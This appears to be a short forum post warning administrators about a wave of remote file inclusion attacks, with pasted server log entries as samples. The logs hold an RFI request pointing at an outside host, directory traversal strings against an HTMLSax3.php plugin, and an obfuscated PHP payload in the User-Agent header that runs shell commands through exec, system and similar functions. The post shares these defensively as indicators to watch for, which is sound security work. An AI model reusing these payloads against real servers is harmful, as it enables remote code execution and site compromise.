It seems there is a new wave of RFI attacks circulating. Be sure to check your logs and keep an eye out for something similar to the following. This is just a sample and I am doing some research and .htaccess modification testing...but just a little heads up for anyone interested.
The host, domains, and ips will most likely very. Notice the agent: http://cr4nk.ws/ [de] (Windows 3.1; I) [crank] which is not something we see very often.
Host: firestarter.dermichi.com
*
/errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i???
Http Code: 404 Date: Sep 19 19:19:16 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]
*
//plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../.
Http Code: 200 Date: Sep 19 19:19:17 Http Version: HTTP/1.1 Size in Bytes: 631
Referer: -
Agent: <? $x0e=\\\145x\\x65\\x63\; $x0f=\\\x66eo\\146\;
$x10=\\\x66\\x72ea\\x64\;
$x11=\\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\;
$x12=\i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\;
$x13=\\\152\\157\\x69\\156\;
$x14=\o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\;
$x15=\ob\\137\\x65\\156d\\137\\x63lea\\156\;
$x16=\\\x6fb_st\\x61\\x72\\164\;
$x17=\\\x70\\141\\163s\\164\\x68\\162\\165\; $x18=\\\x70\\143\\154ose\;
$x19=\p\\157\\160e\\x6e\;
$x1a=\\\163h\\145\\154l\\137\\x65\\170e\\143\;
$x1b=\\\x73\\x79s\\x74e\\x6d\; function x0b($x0b){ global
$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
$x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c =
$x13(\\\n\,$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b);
}elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15();
}elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15();
}elseif(@$x12($x0d = @$x19($x0b,\\\x72\))){ $x0c = \\;
while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} }
return $x0c;}echo
x0b(\ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\);?>
*
//plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../..
Http Code: 200 Date: Sep 19 19:19:18 Http Version: HTTP/1.1 Size in Bytes: 631
Referer: -
Agent: <? $x0e=\\\145x\\x65\\x63\; $x0f=\\\x66eo\\146\;
$x10=\\\x66\\x72ea\\x64\;
$x11=\\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\;
$x12=\i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\;
$x13=\\\152\\157\\x69\\156\;
$x14=\o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\;
$x15=\ob\\137\\x65\\156d\\137\\x63lea\\156\;
$x16=\\\x6fb_st\\x61\\x72\\164\;
$x17=\\\x70\\141\\163s\\164\\x68\\162\\165\; $x18=\\\x70\\143\\154ose\;
$x19=\p\\157\\160e\\x6e\;
$x1a=\\\163h\\145\\154l\\137\\x65\\170e\\143\;
$x1b=\\\x73\\x79s\\x74e\\x6d\; function x0b($x0b){ global
$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
$x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c =
$x13(\\\n\,$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b);
}elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15();
}elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15();
}elseif(@$x12($x0d = @$x19($x0b,\\\x72\))){ $x0c = \\;
while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} }
return $x0c;}echo
x0b(\ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\);?>
gameutopia
